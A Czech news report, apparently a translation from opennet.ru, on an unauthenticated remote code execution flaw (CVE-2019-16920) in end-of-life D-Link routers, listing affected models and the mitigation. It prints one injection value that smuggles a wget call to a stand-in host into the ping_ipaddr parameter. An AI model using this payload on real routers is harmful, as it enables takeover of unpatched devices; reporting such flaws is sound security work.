Vzdáleně zneužitelná zranitelnost v routerech D-Link

V bezdrátových směrovačích D-Link identifikované nebezpečná zranitelnost (CVE-2019–16920), který vám umožňuje vzdáleně spouštět kód na straně zařízení odesláním speciálního požadavku na handler „ping_test“, přístupný bez autentizace.

Zajímavé je, že podle vývojářů firmwaru by mělo být volání „ping_test“ provedeno až po autentizaci, ale ve skutečnosti je voláno v každém případě bez ohledu na přihlášení do webového rozhraní. Zejména při přístupu ke skriptu apply_sec.cgi a předání parametru „action=ping_test“ se skript přesměruje na ověřovací stránku, ale současně provede akci spojenou s ping_test. Pro spuštění kódu byla použita další zranitelnost v samotném ping_test, která volá utilitu ping, aniž by řádně zkontrolovala správnost IP adresy odeslané k testování. Chcete-li například zavolat obslužný program wget a přenést výsledky příkazu „echo 1234“ do externího hostitele, stačí zadat parametr „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Vzdáleně zneužitelná zranitelnost v routerech D-Link

Přítomnost chyby zabezpečení byla oficiálně potvrzena u následujících modelů:

  • DIR-655 s firmwarem 3.02b05 nebo starším;
  • DIR-866L s firmwarem 1.03b04 nebo starším;
  • DIR-1565 s firmwarem 1.01 nebo starším;
  • DIR-652 (neposkytují se žádné informace o problematických verzích firmwaru)

Doba podpory pro tyto modely již vypršela, takže D-Link uvedl, která pro ně nevydá aktualizace k odstranění zranitelnosti, nedoporučuje je používat a radí je nahradit novými zařízeními. Jako řešení zabezpečení můžete omezit přístup k webovému rozhraní pouze na důvěryhodné adresy IP.

Později se zjistilo, že zranitelnost byla také ovlivňuje modely DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 a DIR-825, plány na vydání aktualizací zatím nejsou známy.

Zdroj: opennet.ru

Přidat komentář